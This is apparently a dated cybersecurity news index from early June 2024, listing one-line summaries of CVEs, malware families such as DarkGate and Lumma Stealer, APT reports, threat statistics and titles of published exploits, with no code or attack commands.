5.6.24 | CVE-2024-4358 | Vulnerability | CVE | In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.
5.6.24 | DarkGate | Malware | RAT | During 2023, DarkGate made a comeback with a version full of new features, becoming one of the Remote Access Trojans (RATs) most favored by malicious actors.
5.6.24 | CVE-2017-3506 | Vulnerability | CVE | Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2.
5.6.24 | Sophisticated RAT | Malware | RAT | Sophisticated RAT Targeting Gulp Projects on npm

3.6.24 | IT threat evolution in Q1 2024. Mobile statistics | ANALYSIS | Malware | Mobile malware statistics for Q1 2024: most common threats for Android, mobile banking Trojans, and ransomware Trojans.
3.6.24 | IT threat evolution Q1 2024 | ANALYSIS | Malware | Last June, we published a series of reports on Operation Triangulation, a previously unknown iOS malware platform distributed via zero-click iMessage exploits that allowed an attacker to browse and modify device files, get passwords and credentials stored in the keychain, retrieve geo-location information and execute additional modules that extended their control over compromised devices.
3.6.24 | IT threat evolution in Q1 2024. Non-mobile statistics | ANALYSIS | Malware | Kaspersky solutions blocked more than 658 million attacks from various online resources.
3.6.24 | Cox modems hack | HACKING | Hardware | Hacking Millions of Modems (and Investigating Who Hacked My Modem)
3.6.24 | Andariel | GROUP | APT | Analysis of APT Attack Cases Using Dora RAT Against Korean Companies (Andariel Group)
3.6.24 | Lumma Stealer | Malware | Stealer | Fake Browser Updates delivering BitRAT and Lumma Stealer
3.6.24 | BitRAT | Malware | RAT | Fake Browser Updates delivering BitRAT and Lumma Stealer

1.6.24 | Craft CMS Logs Plugin 3.0.3 - Path Traversal (Authenticated) | Exploit | WebApps | PHP
1.6.24 | ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE) & SSH Access | Exploit | Remote | Hardware
1.6.24 | Wipro Holmes Orchestrator 20.4.1 - Log File Disclosure | Exploit | Remote | Windows
1.6.24 | FreePBX 16 - Remote Code Execution (RCE) (Authenticated) | Exploit | WebApps | PHP
1.6.24 | Akaunting 3.1.8 - Server-Side Template Injection (SSTI) | Exploit | WebApps | PHP
1.6.24 | Check Point Security Gateway - Information Disclosure (Unauthenticated) | Exploit | WebApps | Hardware
1.6.24 | Aquatronica Control System 5.1.6 - Information Disclosure | Exploit | WebApps | Hardware
1.6.24 | changedetection < 0.45.20 - Remote Code Execution (RCE) | Exploit | WebApps | Multiple
1.6.24 | ElkArte Forum 1.1.9 - Remote Code Execution (RCE) (Authenticated) | Exploit | WebApps | PHP
1.6.24 | iMLog < 1.307 - Persistent Cross Site Scripting (XSS) | Exploit | WebApps | PHP
1.6.24 | BWL Advanced FAQ Manager 2.0.3 - Authenticated SQL Injection | Exploit | WebApps | PHP
1.6.24 | Pumpkin Eclipse | HACKING | Hardware | Lumen Technologies’ Black Lotus Labs identified a destructive event in which over 600,000 small office/home office (SOHO) routers belonging to a single internet service provider (ISP) were taken offline.